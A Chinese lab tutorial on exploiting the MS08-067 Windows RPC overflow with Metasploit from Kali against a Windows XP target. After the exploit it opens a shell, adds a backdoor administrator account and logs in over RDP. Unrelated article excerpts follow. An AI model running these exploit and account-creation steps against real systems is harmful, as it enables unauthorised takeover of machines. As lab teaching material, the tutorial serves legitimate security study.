渗透测试基础(四) MS08-067 漏洞攻击

1. 漏洞介绍

  • 漏洞描述
    • Microsoft Windows Server服务RPC请求缓冲区溢出漏洞Windows的Server服务在处理特质RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,以SYSTEM权限执行任意指令。 对于Windows 2000、XP和Server 2003,无需认证便可以利用该漏洞;对于Windows Vista和Server 2008,可能需要认证。
      补充:RPC请求:Windows RPC(Remote Procedure Call,远程过程调用)是一种用于网络中进程间通信的技术,它允许一个进程调用另一个进程中的方法,就像调用本地函数一样。RPC在Windows平台上被广泛使用,用于分布式系统和网络服务之间高效的数据交换和服务调用。在RPC中,客户端发送一个包含参数的请求消息到服务器,这个消息封装了调用的方法、参数以及结果的预期类型。服务器接收到请求后,执行相应的函数并返回结果给客户端。整个过程通常是透明的,因为RPC提供了底层的协议和数据序列化,使得开发者可以专注于业务逻辑,而不必关心网络通信的细节。
  • 官方描述
    • 连接:MS08-067漏洞描述

2. 环境说明

  • 攻击机:kali
    • IP:192.168.102.131
  • 靶机:win XP
    • IP:192.168.102.135

3. 信息收集

  • ping 查看靶机是否存活
  • nmap 查看靶机信息
    在这里插入图片描述

4. 渗透攻击

4.1. 启动msf

  • 命令:msfconsole

4.2. 查找漏洞

  • 命令:search ms08-067在这里插入图片描述

4.3. 使用攻击模块,设置攻击载荷,设置测试机IP,设置靶机IP

  • 使用攻击模块,命令:use +攻击模块
  • 设置测试机IP,命令如下:
    • set rhost 靶机IP
    • set lhost 测试机IP
      在这里插入图片描述

4.4. 开始攻击

  • 命令:run
    在这里插入图片描述
    可以发现成功建立

5. 顺利进入主机

5.1 查看权限

  • Win命令:getuid
    在这里插入图片描述
  • Linux命令:whoami

5.2 进入shell

  • 命令:shell
    • 此时就进入当前权限下的shell
      在这里插入图片描述

5.3 添加用户帐号

  • 命令:net user 用户 密码 /add
    在这里插入图片描述

5.4 把刚刚创建好的用户添加到管理员组

  • 命令:net localgroup administrators 用户 /add
    在这里插入图片描述

5.5 远程登录到XP系统

  • 命令为:rdesktop 192.168.102.135
    • 前提需要让靶机支持被远程连接,做如下配置
      在这里插入图片描述
  • rdesktop 192.168.102.135 远程连接
    在这里插入图片描述

5.6 登录到XP系统,查看攻击是否生效

  • 打开CMD查看刚刚创建的用户是否添加到管理员组
    在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/30802.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

太湖远大毛利率下滑:研发费用率远低同行,募投项目合理性疑点重重

《港湾商业观察》黄懿 6月20日,浙江太湖远大新材料股份有限公司(以下简称“太湖远大”,873743.NQ)即将迎来过会。 2023年11月30日,太湖远大所提交的上市申请材料正式获北交所受理,保荐机构为招商证券&…

功能测试 之 单模块测试----添加会员

1.需求分析 点击【添加会员】按钮后,页面跳转至添加会员详细页面。 说明: 会员昵称:必填,长度在20个字符(除去空格)以内,(会员昵称)可以重复;登录密码&#x…

关于IntelliJ IDEA 2024.1版本更新的问题

希望文章能给到你启发和灵感~ 感谢支持和关注~ 阅读指南 序幕一、基础环境说明1.1 硬件环境1.2 软件环境 二、起因三、解决四、总结 序幕 近期,IntelliJ IDEA 推出了全新2024版本,相信很多编程的爱好者或者刚接触编程的小伙伴都会…

gorm简介

【1】ORM: 即Object-Relational Mapping,它的作用是在关系型数据库和对象之间作一个映射,这样我们在具体的操作数据库的时候,就不需要再去和复杂的SQL语句打交道,只要像平时操作对象一样操作它们就可以了。 【2】GORM gorm是go语言的一个orm…

Linux之gzip压缩和解压缩

Linux之gzip压缩和解压缩 gzip命令是压缩和解压缩命令,用于操作".gz"格式的的文件。gzip对文本文件的压缩率有60%~70%。 命令格式 注意,选项的顺序不可变tar -zcvf 打包压缩文件名.tar.gz 被压缩的文件/目录 --压缩文件 tar -zxvf 打包文…

SpringBoot的冬奥会科普平台 LW +PPT+源码

3 平台分析 3.1 平台可行性分析 3.1.1 经济可行性 由于本平台是作为毕业设计平台,且平台本身存在一些技术层面的缺陷,并不能直接用于商业用途,只想要通过该平台的开发提高自身学术水平,不需要特定服务器等额外花费。所有创造及工…

【每日刷题】Day70

【每日刷题】Day70 🥕个人主页:开敲🍉 🔥所属专栏:每日刷题🍍 🌼文章目录🌼 1. 922. 按奇偶排序数组 II - 力扣(LeetCode) 2. 905. 按奇偶排序数组 - 力扣&…

CSS--超出就显示滚动条并设置滚动条的样式

原文网址:CSS--超出就显示滚动条并设置滚动条的样式_IT利刃出鞘的博客-CSDN博客 简介 本文介绍HTML如何超出就显示滚动条并设置滚动条的样式。 超出就显示滚动条 方法如下: 第一步:设置父容器的高度(height或者max-height&am…

Bigtable的数据结构

Bigtable的数据结构 1. 表(Table) 基本单位:Bigtable存储数据的基本单位是表,一个表由多行组成。无限制:表可以非常大,理论上没有大小限制。 2. 行(Row) 行键:每一行…

GeoServer安装启动

GeoServer 使用 servlet 容器(例如Apache Tomcat)打包为独立的 Java web 应用程序。以下说明专门针对 Tomcat。它可能不适用于其他容器应用程序。 在 Tomcat 上安装 导航到GeoServer 下载页面。从“已存档”中,选择最新的 2.18.x 版本的 GeoS…

Python12 列表推导式

1.什么是列表推导式 Python的列表推导式(list comprehension)是一种简洁的构建列表(list)的方法,它可以从一个现有的列表中根据某种指定的规则快速创建一个新列表。这种方法不仅代码更加简洁,执行效率也很…

iOS 17.6养老版发布,旧机必升?

iOS 17.6 的第一个开发者测试版已发布,另外还发布了macOS 14.6、watchOS 10.6、iPadOS 17.6 等。 苹果iOS系统更新一直是科技爱好者和用户关注的焦点,尤其是在iOS18的测试阶段,其吸引力尤为显著。尽管苹果同时推送了iOS17.6 Beta1&#xff0c…

linux 如何判断磁盘是HDD还是SSD

本文主要是判断磁盘是 HDD 还是不上 HDD,只用于直通盘的判断,raid盘不在内 方法一、 使用lsblk 命令判断 # 仅查看物理盘的名称、空间大小、SSD(0)? HDD(1)?, 设备供应商以及状态。 [integraTorsctyunos ~]$ lsblk -d -o NAME,SIZE,ROTA,VENDOR,STATE…

kimi+的+能为论文写作+出什么?我帮你试过了!

学境思源,一键生成论文初稿: AcademicIdeas - 学境思源AI论文写作 Kimi是月之暗面科技有限公司开发的个性化智能助手功能。相比kimi,Kimi能够提供个性化定制服务,根据用户特定需求提供更专业深入的辅助,实现一对一的智…

多线程(总结黑马程序员)

一、什么是线程? 是一个程序内部的一条执行流程 多线程是什么? 多条线程由CPU负责调度执行 多线程的创建方式一:继承Thread类 //1.继承Thread类 public class MyThread extends Thread {//2.必须重写run方法Overridepublic void run() {…

人工智能之AI作画

AI作画(AI-generated Art)是指利用人工智能技术来创作艺术作品的过程。随着深度学习和生成模型的发展,AI作画已经在艺术界和技术界引起了广泛关注和研究。从专业角度来看,AI作画涉及多个技术领域,包括计算机视觉、机器…

【人机交互 复习】第9章 以用户为中心的设计

一、以用户为中心的设计(UCD) 1.思想: (1)好的设计结果使客户感到满意。 (2)设计过程是设计人员与客户之间的协作过程。设计要进化并适应客户不断变化的考虑,作为一种副产品&#…

Clickhouse备份恢复_clickhouse-client方式backup命令之备份目录的设置

https://clickhouse.com/docs/en/operations/backup#command-summary 想要backup database dbname to Disk(‘diskname’,‘backupfilename.zip’)成功的话&#xff0c;需要符合3点 1、diskname需要在/etc/clickhouse-server/config.d/backup_disk.xml在<storage_configura…

【数据结构】【版本1.3】【线性时代】——栈

快乐的流畅&#xff1a;个人主页 个人专栏&#xff1a;《算法神殿》《数据结构世界》《进击的C》 远方有一堆篝火&#xff0c;在为久候之人燃烧&#xff01; 文章目录 引言一、栈的概念二、栈的模拟实现2.1 定义2.2 初始化2.3 销毁2.4 压栈2.5 判空2.6 出栈2.7 获取栈顶元素2.8…

RAG优化技巧|7大挑战与解決方式|提高你的LLM能力

在当今快速发展的人工智能领域&#xff0c;大型语言模型&#xff08;LLM&#xff09;已经成为无处不在的技术&#xff0c;它们不仅改变了我们与机器交流的方式&#xff0c;还在各行各业中发挥着革命性的影响。 然而&#xff0c;尽管LLM RAG的能力已经让人惊叹&#xff0c;但我…